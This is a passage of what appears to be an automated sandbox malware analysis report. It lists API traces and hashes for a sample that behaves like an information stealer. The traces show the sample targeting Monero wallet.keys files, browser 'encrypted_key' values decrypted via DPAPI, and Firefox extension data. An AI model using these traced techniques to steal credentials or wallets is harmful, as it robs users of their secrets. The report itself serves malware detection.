                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047D481
                    • lstrlen.KERNEL32(00000000), ref: 0047D698
                    • lstrlen.KERNEL32(00000000), ref: 0047D6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 0047D72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 0fc626a0b29ec3b7c3a33f50d10a12740d06dc9ccf01ecb72ca222b264b6fe2a
                    • Instruction ID: 35ed16b6f1647c967c7b78d2a67c36eaed80b8bbaac4cf37637a9e6b4e87d7a4
                    • Opcode Fuzzy Hash: 0fc626a0b29ec3b7c3a33f50d10a12740d06dc9ccf01ecb72ca222b264b6fe2a
                    • Instruction Fuzzy Hash: 6A9112718101049AEB08FBA5DC92EEE7339AF14304F50496FF51672091EFBC6A59CB7A
                    Function 0047D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047D801
                    • lstrlen.KERNEL32(00000000), ref: 0047D99F
                    • lstrlen.KERNEL32(00000000), ref: 0047D9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 0047DA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: c1a132b629ff6006a90d6c28cbff0cfff0cfbf764b03f1c9d6217f29e03af30e
                    • Instruction ID: 5c343daa9ab4c61fccb479c1d603e00914ff5dd36714a2c01817ed9d6c46e39d
                    • Opcode Fuzzy Hash: c1a132b629ff6006a90d6c28cbff0cfff0cfbf764b03f1c9d6217f29e03af30e
                    • Instruction Fuzzy Hash: F38123B18101049AEB04FBA5DC92DEE7339AF14304F50496FF106A6091EFBC6A59CB7A
                    Function 0047F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00491580,00490D92), ref: 0047F54C
                    • lstrlen.KERNEL32(00000000), ref: 0047F56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 0fe98b07042afb4ccaa4003a806a8e696d95eaa03fee0abd71459caafd61d7b9
                    • Instruction ID: b617e1b448a33af3d705ea1fff4bf05e7be2a582f18b625ba2eb1e18ae1b044c
                    • Opcode Fuzzy Hash: 0fe98b07042afb4ccaa4003a806a8e696d95eaa03fee0abd71459caafd61d7b9
                    • Instruction Fuzzy Hash: 76513375D00108AAEB04FBA5DC92DED7338AF54304F50892FF41667191EE7C6A19CBBA
                    Function 004870D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                    Download Yara Rule
                    Strings
                    • sH, xrefs: 00487111
                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0048718C
                    • sH, xrefs: 004872AE, 00487179, 0048717C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy
                    • String ID: sH$sH$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                    • API String ID: 3722407311-4088985431
                    • Opcode ID: 012c403b5a071571e999b0e421351aec39b5a2d3457c9e8fc3baa29eb5784769
                    • Instruction ID: 4efd463455bf8b31d1b8a87607ffb6ed76c4e8c659e5258606c73d189f96f40f
                    • Opcode Fuzzy Hash: 012c403b5a071571e999b0e421351aec39b5a2d3457c9e8fc3baa29eb5784769
                    • Instruction Fuzzy Hash: CF5182B0D042189FDB14FB91DC95BEEB774AF54304F2044AEE11576281EB786E88CF59
                    Function 00483560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: c5ea2d586dec96a9d9d2ebd23dbf6aad3bc5cfdc2ffd4a66f4ac56b77362f4e3
                    • Instruction ID: c2714fdc39730bc4dbcb0156ca53f870721a3e0327c8ff253b04ebd95bfec0cd
                    • Opcode Fuzzy Hash: c5ea2d586dec96a9d9d2ebd23dbf6aad3bc5cfdc2ffd4a66f4ac56b77362f4e3
                    • Instruction Fuzzy Hash: AF4161B1D10108AFDB04FFE5C845AEE7774AF04704F10881AE41576250EB78AA06CBAA
                    Function 00479CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00479D39
                      • Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
                      • Part of subcall function 00479AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
                      • Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
                      • Part of subcall function 00479AC0: LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F
                      • Part of subcall function 00479B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00479B84
                      • Part of subcall function 00479B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00479BA3
                      • Part of subcall function 00479B60: LocalFree.KERNEL32(?), ref: 00479BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: febfa2a222d6935049fc205dc9ff99beea5168b9d3a94249d809a41107d788ec
                    • Instruction ID: 9a56156c59f7ce3621b648b6aaa923063c3f9bbd114c39dfb98c4c29c54189c0
                    • Opcode Fuzzy Hash: febfa2a222d6935049fc205dc9ff99beea5168b9d3a94249d809a41107d788ec
                    • Instruction Fuzzy Hash: 133132B5D10109ABDF14EBE4DC85AEF77B8AB48304F14855EE905A7241F7389E04CBA5
                    Function 00488680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004905B7), ref: 004886CA
                    • Process32First.KERNEL32(?,00000128), ref: 004886DE
                    • Process32Next.KERNEL32(?,00000128), ref: 004886F3
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • CloseHandle.KERNEL32(?), ref: 00488761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 58ca6f04c7cdd08cabe785368bfada83c8c9ad23538071c39ef1ba1a222a176d
                    • Instruction ID: 5b326ae94f1f87f5476b603458752519d7ae1d3ae3efed5bb0860ef219c448df
                    • Opcode Fuzzy Hash: 58ca6f04c7cdd08cabe785368bfada83c8c9ad23538071c39ef1ba1a222a176d
                    • Instruction Fuzzy Hash: BD314F71901118ABDB24FB91CC41FEEB778EB45700F5045AEE109A2190DF786A85CFA5
                    Function 00487980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00490E00,00000000,?), ref: 004879B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 004879B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00490E00,00000000,?), ref: 004879C4
                    • wsprintfA.USER32 ref: 004879F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: 375ce6bb59398974f1dd6ed8710d135ea266adbfbbd376e2ddbee4e8ed962dfc
                    • Instruction ID: 7eecb7ee6da5003b60a3bf979ab17e46814547a74611366c9a2e616fea87aa0a
                    • Opcode Fuzzy Hash: 375ce6bb59398974f1dd6ed8710d135ea266adbfbbd376e2ddbee4e8ed962dfc
                    • Instruction Fuzzy Hash: 301127F2904118ABCB14DFC9DD45BBEB7F9FB4CB11F10461AF605A2280E2395940CBB5
                    Function 0048C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __getptd.LIBCMT ref: 0048C74E
                      • Part of subcall function 0048BF9F: __amsg_exit.LIBCMT ref: 0048BFAF
                    • __getptd.LIBCMT ref: 0048C765
                    • __amsg_exit.LIBCMT ref: 0048C773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0048C797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: 16a4fdcfe3093d6c51960b9d639cfed85d4ecb5b961e98e7cb536626ba3dd07b
                    • Instruction ID: f3d18f5d473ed4f3333001d8bf05c5921ec5099271d198795241cd1c59e0bdd3
                    • Opcode Fuzzy Hash: 16a4fdcfe3093d6c51960b9d639cfed85d4ecb5b961e98e7cb536626ba3dd07b
                    • Instruction Fuzzy Hash: 11F06D329042119FD721BBB95887B4E33A0AF00728F20495FF604A62D2DB7C59419FAE
                    Function 00484F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    APIs
